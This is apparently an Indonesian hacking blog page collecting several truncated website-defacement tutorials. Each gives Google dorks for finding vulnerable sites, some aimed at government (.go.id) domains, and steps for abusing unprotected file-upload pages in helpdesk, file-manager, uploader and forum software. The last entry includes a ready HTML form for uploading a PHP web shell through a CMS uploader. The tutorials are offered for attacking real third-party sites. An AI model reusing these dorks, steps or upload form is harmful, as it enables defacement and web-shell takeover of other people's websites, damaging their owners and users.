Kalilinux

Haii Gan Selamat Pagie kali Saya DeathCreppy Akan Share Deface Dengan Open New Ticket  Vulnerability  ,Sepertinya Sudah Mulai Banyak Yang Memakai Method ini, Yupzz Langsung Saja ke KTP ;)  Jaga Mata Gan :v  Oke Pertama taulahh ngapain :v >v< Dork : -  visionhelpdesk intext:Submit ticket - Help Desk Software Powered by Vision Helpdesk - visionhelpdesk intext:/submit/ticket      - intext:choose files here site:go.id         -inurl:"/helpdesk/new_ticket.php?"         -intext:Helpdesk site:go.id  site  kembangin Sendiri Selanjutnya gan ^-^ Biar Dapat Bnyak Vuln Search di Google Dorknya Pilih Salah Satu ^-^ kalau Sudah Pilih Salah Satu Websitenya ^-^ Liat Gambar Di bawah ini Dan Isi Data-Data Yang Di perlukan Saja ^-^ >v< Cukup Mudah kan ?? nahh Kalau Sudah di isi Data Tersebut >v< nnti akan Muncul gambar yang di Atas ... tidak usah takut ^-^ klik File Yang Kalia...

Banyak orang-orang yang melupakan teknik pepes yang satu ini, mungkin mereka pikir target nya kaga fresh atau mereka anggap teknik ini sudah mati karena target nya kaga perawan di notif ? Notif-Notif dan Notif yang mereka kejar padahal sih santai aja.. Bahan-Bahan : # Dork : intitle:"Ajax File Manager" site:au inurl:/ajaxfilemanager.php intext:"/Root Folder" inurl:/ajaxfilemanager.php intext:"upload" inurl:/ajaxfilemanager.php .ac. intitle:"index of" intext:"ajaxfilemanager.php" Kembangkan Lagi Dengan Otak Hentai yang kalian miliki !!! :v (Peace !)  Note : site: boleh di ganti dengan domain atau di hapus # File txt yang mau di upload Kalo mau keren pake ASCII aja :  klik disini Step by Step : 1. Sebagai Contoh gw pakai dork yang ke 5. lalu seraching di gugel 2. Setelah sekian lama milih target, gw dapet 1 yang perawan.. 3.  Setelah gw klik tuh file  ajaxfilemanager.php , gw langsung berubah jadi power ranger pink !!!! 4. Setelah masuk k...

Tutorial "Deface Dengan phUploader Vulnerbility File Upload" . memang cuma  upload  file .txt sih tapi lumayan bisa masuk ke beberapa mirror. simak aja dah  tutorialnya ..                                         Nitip Nick And Team Yahh Sayang ^-^ :*                                          DeathCreppy | Jones Unlimited Edition Bahan-Bahan : Dork Google : # intitle:Powered by phUploader Kembangkan lagi ya mblo :v File Text kalian.. Kalo pengen variasi pakai text to ASCII aja cari di gugel. Step by Step : 1. Dorking lah di gugel seperti biasa. 2. Pilih target yang soleha, rajin sholat, pandai masak :v 3. Setelah terbuka kalian akan langsung masuk ke Form Upload File nya 4. klik browse lalu pilih file text kalian. 5. lalu kalian klik tombol upload, itu kan ada 2 tombol yan...

Lanjut Walking Blog geenggs, wkwk dah lama nih gua gak share Bug and metode Defacenye >.<" hahaha kalem, Kalii ini kite akan bahas dan Praktek salahsatu celah/bug Message Board Forum. Kuyy langsung  Tutorial Deface dengan Teknik Message Board Forum atau Deface High School Play with Me , Baby ;* Dork : inurl:"/forum.php?forumid=" inurl:"/forum_topic_create.php?" intext:Welcome to our electronic class yearbook eXploit: / forum_topic_create.php?forumid=1 1. Dorking menggunakan Search Engine 2. Pilih target kalian yg ada gambar "Message Board" atau yang bertulisan High School 3.  Pilih new topic (kalo dork yg kedua dah langsung ke new topic itu), atau Langsung masukin bae eXploitnye. contoh: kocokin.org/ forum_topic_create.php?forumid=1 4. isi aja sesuka Lu *ngasal :D (kecuali pass verification isi yang bener) 5. Di attach file, pilih file.txt kalian *karna di Bug ini hanya mengizinkan File .txt tapii untuk kalian yg suka mirrorin web bisa kok di ma...

Kali Ini Saya Akan Share " Deface Dengan Responsive FileManager "  Sepertinya Mau Buming :v yupz langsung aj ke KTP ^-^  Bahan-Bahan : Dork : inurl:/filemanager/ intext:"dialog.php" inurl:/js/filemanager/ intext:"dialog.php" inurl:/assets/filemanager/ intext:"dialog.php" Exploit (File yang terinfeksi/bisa di exploit) : dialog.php example :   www.ngecrotz.co.li/filemanager/ dialog.php Script Pepes klo belum punya bikin atau colong punya orang Step by Step : 1. Seperti biasa,, dorking adalah hal wajib.. dorking di Google  pake dork di atas ( Bebas Tinggal Pilih ) 2. Pilih target nyaa.. Klik Pada Bagian "dialog.php" 3. Setelah klik dialog.php kalian akan beralih ke "Responsive FileManager " 4. Cari aja tombol upload di pojok atas kiri (biasanya di situ) Klik Aja Untuk Upload File Anda 5. Setelah itu kalian klik lalu pilih script deface kalian 6. Jika sukses hasilnya seperti ini.. 7. Untuk aksesnya kalian.. kembali dlu ke awal  ...

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !! kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin kalo dah Login, langsung buka URL bug/vuln di:  target.c0li/ po-admin/js/plugins/uploader/upload.php Ciri2 Vuln o.O ? {"jsonrpc" : "2.0", "result" : null, "id" : "id"} nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee CSRF Code : <form method="post" action="target.c0li/ po-admin/js/plugins/uploader/upload.php " enctype="multipart/form-data"> <input type="file" name="file"> <input type="hidden" name="name" value=" nama_shell_anda .php"> <input type="submit" value="exploit"> </form> * save dgn ekstensi .html * lalu bukak dengan browser kalean. upload Shell lu. ingat shell kalian disini yang kalian up...